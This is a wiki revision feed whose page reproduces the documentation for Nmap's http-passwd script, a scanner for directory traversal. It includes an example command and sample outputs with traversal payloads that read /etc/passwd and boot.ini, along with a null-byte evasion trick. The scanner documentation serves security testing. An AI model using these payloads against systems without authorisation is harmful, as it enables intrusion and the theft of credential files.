https://lms.onnocenter.or.id/wiki/index.php?action=history&feed=atom&title=Nmap%3A_hack_password_via_httpNmap: hack password via http - Revision history2026-04-20T03:45:19ZRevision history for this page on the wikiMediaWiki 1.45.1https://lms.onnocenter.or.id/wiki/index.php?title=Nmap:_hack_password_via_http&diff=51244&oldid=prevOnnowpurbo: Created page with " File http-passwd Script types: portrule Categories: intrusive, vuln Download: https://svn.nmap.org/nmap/scripts/http-passwd.nse User Summary Checks if a web server is vulne..."2018-06-01T02:51:19Z<p>Created page with " File http-passwd Script types: portrule Categories: intrusive, vuln Download: https://svn.nmap.org/nmap/scripts/http-passwd.nse User Summary Checks if a web server is vulne..."</p>
<p><b>New page</b></p><div><br />
File http-passwd<br />
<br />
Script types: portrule<br />
Categories: intrusive, vuln<br />
Download: https://svn.nmap.org/nmap/scripts/http-passwd.nse<br />
User Summary<br />
<br />
Checks if a web server is vulnerable to directory traversal by attempting to retrieve /etc/passwd or \boot.ini.<br />
<br />
The script uses several technique:<br />
<br />
Generic directory traversal by requesting paths like ../../../../etc/passwd.<br />
Known specific traversals of several web servers.<br />
Query string traversal. This sends traversals as query string parameters to paths that look like they refer to a local file name. The potential query is searched for in at the path controlled by the script argument http-passwd.root.<br />
<br />
Script Arguments<br />
<br />
http-passwd.root<br />
<br />
Query string tests will be done relative to this path. The default value is /. Normally the value should contain a leading slash. The queries will be sent with a trailing encoded null byte to evade certain checks; see http://insecure.org/news/P55-01.txt.<br />
slaxml.debug<br />
See the documentation for the slaxml library.<br />
http.max-cache-size, http.max-pipeline, http.pipeline, http.useragent<br />
See the documentation for the http library.<br />
smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername<br />
See the documentation for the smbauth library.<br />
<br />
Example Usage<br />
<br />
nmap --script http-passwd --script-args http-passwd.root=/test/ <target><br />
<br />
Script Output<br />
<br />
80/tcp open http<br />
| http-passwd: Directory traversal found.<br />
| Payload: "index.html?../../../../../boot.ini"<br />
| Printing first 250 bytes:<br />
| [boot loader]<br />
| timeout=30<br />
| default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS<br />
| [operating systems]<br />
|_multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect<br />
<br />
80/tcp open http<br />
| http-passwd: Directory traversal found.<br />
| Payload: "../../../../../../../../../../etc/passwd"<br />
| Printing first 250 bytes:<br />
| root:$1$$iems.VX5yVMByaB1lT8fx.:0:0::/:/bin/sh<br />
| sshd:*:65532:65534::/:/bin/false<br />
| ftp:*:65533:65534::/:/bin/false<br />
|_nobody:*:65534:65534::/:/bin/false<br />
<br />
Requires<br />
<br />
http<br />
shortport<br />
stdnse<br />
string<br />
<br />
Authors:<br />
<br />
Kris Katterjohn<br />
Ange Gutek<br />
<br />
License: Same as Nmap--See https://nmap.org/book/man-legal.html</div>Onnowpurbo